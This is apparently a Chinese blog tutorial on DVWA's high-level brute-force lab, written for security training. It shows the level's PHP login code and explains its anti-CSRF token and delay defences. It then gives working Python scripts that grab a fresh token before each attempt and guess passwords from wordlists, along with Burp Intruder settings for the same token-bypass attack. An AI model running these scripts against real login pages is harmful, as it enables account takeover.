High Level

查看源码

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        $html .= "<p>Welcome to the password protected area {$user}</p>";
        $html .= "<img src="{$avatar}" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        $html .= "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

high.php

我们发现

(1)代码加入了token,可以抵御CSRF攻击,同时也增加了爆破的难度。通过抓包,可以看到,登录验证时提交了四个参数:username、password、Login以及user_token。

DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。

DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

(2)源码使用了stripslashes()、 mysql_real_escape_string()对参数username、password进行过滤、转义,进一步抵御sql注入。

★stripslashes()

去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个。

mysql_real_escape_string()

函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

x00



x1a

如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

(3)错误页面使用了sleep( rand( 0, 3 ) );,也就是说当我们输入错误的用户名或密码时,会随机等待0-3秒后才显示错误信息。降低了暴力破解的效率。

漏洞利用

针对这样的情况,我们能不能攻破呢?答案是肯定的,我们需要重新设计破解动作:

破解动作:访问首页——获得user_token参数——发送带user_token的登录数据包

方法一 python脚本

# Author:Zheng Na
import requests,re

url = 'http://127.0.0.1/dvwa/vulnerabilities/brute/'
headers = {"Cookie":"security=high; PHPSESSID=hcf6rpl3qghlai922bnjhup465"}

flag = False

f1 = open("username.txt", 'r')
for line1 in f1:
    username = line1.strip()

    f2 = open("password.txt", 'r')
    for line2 in f2:
        # 访问首页
        response1 = requests.get(url,headers=headers)
        # 获取user_token
        user_token = re.findall("(?<=<input type='hidden' name='user_token' value=').+?(?=' />)",response1.text)[0]
        # 发送登录数据包
        password = line2.strip()
        params = {'username': username, 'password': password, 'Login': 'login','user_token':user_token}
        response2 = requests.get(url, params=params, headers=headers)
        if "Username and/or password incorrect." in response2.text:
            print("username:%s,password:%s,user_token:%s----wrong account!" % (username, password, user_token))
        else:
            print("33[31;1musername:%s,password:%s,user_token:%s----right account!33[0m" % (username, password, user_token))
            flag = True
            break
    if flag == True:
        break
    f2.close()
f1.close()

结果

DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

PS:由于本关每次尝试密码时,都需要附带上一个请求返回的token,因此本关不能使用多线程脚本,否则无法验证token。

另外,写Python脚本时,除了使用re模块正则表达式匹配token外,还可以使用以下2种方法。

使用PyQuery方法

# Author:Zheng Na
import requests
from pyquery import PyQuery

url = 'http://127.0.0.1/dvwa/vulnerabilities/brute/'
headers = {"Cookie":"security=high; PHPSESSID=hcf6rpl3qghlai922bnjhup465"}

# 访问首页
response1 = requests.get(url, headers=headers)
# 获取user_token
pq=PyQuery(response1.text)
user_token = pq("input[name=user_token]").val()
print(user_token) #返回:fbe4b1539c50640a96bca639d09f42c4

使用BeautifulSoup方法

# Author:Zheng Na
import requests
from bs4 import BeautifulSoup

url = 'http://127.0.0.1/dvwa/vulnerabilities/brute/'
headers = {"Cookie":"security=high; PHPSESSID=hcf6rpl3qghlai922bnjhup465"}

# 访问首页
response1 = requests.get(url, headers=headers)
# 获取user_token
soup = BeautifulSoup(response1.text,"xml")
user_token = soup.find_all('input')[3]["value"] 
print(user_token) #返回:fdccfe30e48a860eb62d19d6bae1e8fb

方法二 burpsuite爆破

步骤

1.抓包,发送到Intruder模块

DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

2.选择Pitchfork(草叉模式),添加爆破的参数

DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

3.在Options中找到Request Engine模块,把线程数设为1

 DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

4.在Options中找到Rediections模块,选择always,允许重定向

DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

5.在Options中找到Grep-Extract模块,点击Add,并设置筛选条件,得到user_tokenDVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

6.在Payloads中为选择的参数设置字典

 DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

 DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

 DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

7.点击start attack,开始爆破

DVWA-1.3 Brute Force(暴力破解)-High-绕过token-风君雪科技博客

根据返回长度的大小,可以得到正确的用户密码

参考:

https://www.cnblogs.com/bmjoker/p/9096225.html

https://www.freebuf.com/articles/web/116437.html